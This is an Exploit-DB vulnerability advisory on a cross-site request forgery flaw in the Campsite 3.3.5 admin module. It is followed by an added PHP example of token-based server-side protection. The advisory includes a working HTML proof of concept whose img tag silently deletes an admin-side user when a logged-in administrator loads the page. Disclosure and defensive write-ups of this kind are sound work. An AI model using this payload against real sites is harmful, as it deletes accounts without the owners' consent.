Campsite 3.3.5 – Cross-Site Request Forgery

  • Author: pratul agrawal
    Date: 2010-03-10
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/11676/
  •  =======================================================================
     
     campsite 3.3.5 CSRF Vulnerability
     
     =======================================================================
     
     by
     
    Pratul Agrawal
     
     
     
    # Vulnerability found in- Admin module
     
    # email Pratulag@yahoo.com
     
    # company aksitservices
     
    # Credit by Pratul Agrawal
    
    # Category	CMS / Portals
    
    # Site p4ge http://wwwcampware.org/
    
    # Platform php
    
     
     
    #Proof of concept #
     
    Targeted URL:http://server/admin/login.php
    
     
    Script to delete the Admin user through Cross Site request forgery
    
     ...................................................................................................................
    
    <html>
    
    <body>
    
     <img src=http://server/admin/users/do_del.php?User=[userID]&uType=Staff />
    
    </body>
    
    </html>
    
    
     ...................................................................................................................
    
    
    
    After execution, refresh the page and you can see that the user with the given ID gets deleted automatically.
     
     
    #If you have any questions, comments, or concerns, feel free to contact me.
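
The server-side check whose absence makes the proof of concept above work, added here as an example; it is not code from Campsite or from the original advisory. The function names, the `csrf_token` field and the status codes are assumptions; only the `User` and `uType` parameters come from the advisory.

```php
<?php
declare(strict_types=1);
// Added example, not Campsite code; every function name here is hypothetical.

// Return the per-session anti-CSRF token, creating it on first use.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a user-deletion request may proceed.
// Returns an HTTP status code: 200 = proceed, anything else = refuse.
function check_delete_request(string $method, array $post, array $session): int
{
    // State-changing actions must not be reachable via GET, which is what
    // an <img> tag (as in the proof of concept) issues.
    if ($method !== 'POST') {
        return 405;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // A cross-site page cannot read the victim's session token, so a forged
    // request fails here. hash_equals() compares in constant time.
    if (!is_string($supplied) || $expected === '' || !hash_equals($expected, $supplied)) {
        return 403;
    }
    // Validate the ID strictly instead of passing it through.
    if (!isset($post['User']) || !is_string($post['User']) || !ctype_digit($post['User'])) {
        return 400;
    }
    return 200;
}

// Constructed requests standing in for $_SERVER / $_POST / $_SESSION.
$session = [];
$token = csrf_token($session);
$cases = [
    'forged GET via <img>'      => ['GET',  []],
    'forged POST, no token'     => ['POST', ['User' => '7', 'uType' => 'Staff']],
    'genuine admin form submit' => ['POST', ['User' => '7', 'uType' => 'Staff', 'csrf_token' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    printf("%-26s => %d\n", $label, check_delete_request($method, $post, $session));
}
```

In a real handler the token would be written into the admin form as a hidden field, and the three arrays would be `$_SERVER['REQUEST_METHOD']`, `$_POST` and `$_SESSION`.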